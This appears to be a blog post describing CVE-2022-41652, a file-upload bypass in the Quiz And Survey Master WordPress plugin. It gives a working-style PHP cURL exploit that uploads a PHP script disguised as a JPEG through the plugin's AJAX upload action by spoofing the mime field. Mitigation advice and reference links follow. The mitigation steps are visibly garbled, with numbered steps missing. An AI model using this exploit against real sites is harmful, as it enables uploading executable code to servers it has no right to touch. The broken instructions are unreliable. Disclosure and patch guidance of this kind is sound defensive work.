The Quiz And Survey Master (QSM) plugin is a popular choice among WordPress users for creating quizzes and surveys on their websites. However, a recent bypass vulnerability was discovered in QSM plugin versions <= 7.3.10, which has been assigned the CVE identifier CVE-2022-41652. In this long read post, we will cover the details of this vulnerability, provide code snippets to demonstrate the exploit, and link to the official references and patches. By the end of this article, you should have a better understanding of the issue and know how to protect your WordPress website from this vulnerability.
What is CVE-2022-41652?
The vulnerability exists because the QSM plugin does not properly validate user input when handling file uploads in quiz and survey forms. This allows an attacker to upload malicious files to the server, bypassing the plugin's security checks and potentially causing harm to the website or its visitors.
The exploit can be triggered by exploiting the logical flaw in the plugin's code responsible for validating the file uploads. As an attacker, one needs to carefully craft a payload that bypasses the security restrictions and uploads a malicious file to the server.
Let's take a look at the sample code snippet that demonstrates the exploit
<?php
// Exploit for CVE-2022-41652
// Bypass vulnerability in Quiz and Survey Master plugin <= 7.3.10
// Payload: <?php echo "Hacked!"; ?>
// Save as payload.jpg
$url = "http://example.com/wp-admin/admin-ajax.php";;
$post_data = array(
"action" => "qsm_upload_user_file",
"nonce" => "292d5c916272a77fde72156a05b80964",
"question_id" => "1",
"mlw_quiz_id" => "1",
"mlw_quiz_pass" => "xyz",
"mime" => "image/png_.jpg"
);
$file_data = array(
"file" => new \CurlFile("payload.jpg", "image/jpeg", "payload.jpg"),
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($post_data, $file_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);
echo "Exploit executed, check server for uploaded payload!";
?>
In the above code snippet, the attacker crafts the POST request to upload a file named payload.jpg, which is actually a PHP script (a simple backdoor) disguised as an image file. The script contains the following payload:
<?php echo "Hacked!"; ?>
When this payload is executed on the server, it will display "Hacked!" to the user.
Links to Original References
1. Official CVE-2022-41652 disclosure: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41652
2. QSM Plugin on WordPress: https://wordpress.org/plugins/quiz-master-next/
3. Official release notes of the patch: https://github.com/QuizandSurveyMaster/quiz_master_next/blob/master/readme.txt
How to Mitigate CVE-2022-41652
The security issue has been addressed in QSM plugin version 7.3.11. Therefore, to protect your WordPress website from this vulnerability, it is highly recommended to update the Quiz And Survey Master plugin to the latest version. Here's how you can do it:
Go to the 'Plugins' section and find the Quiz And Survey Master plugin.
3. Click on the 'Update Now' link, which should be visible next to the plugin's name if an update is available.
Conclusion
By staying updated with the latest security patches and keeping an eye on the official channels for information and updates, you can keep your WordPress website safe from vulnerabilities like CVE-2022-41652. Be sure to follow best practices for securing your WordPress installation, including using strong passwords, keeping all plugins and themes updated, and regularly monitoring your website for suspicious activity.
Timeline
Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/21/2022 17:10:00 UTC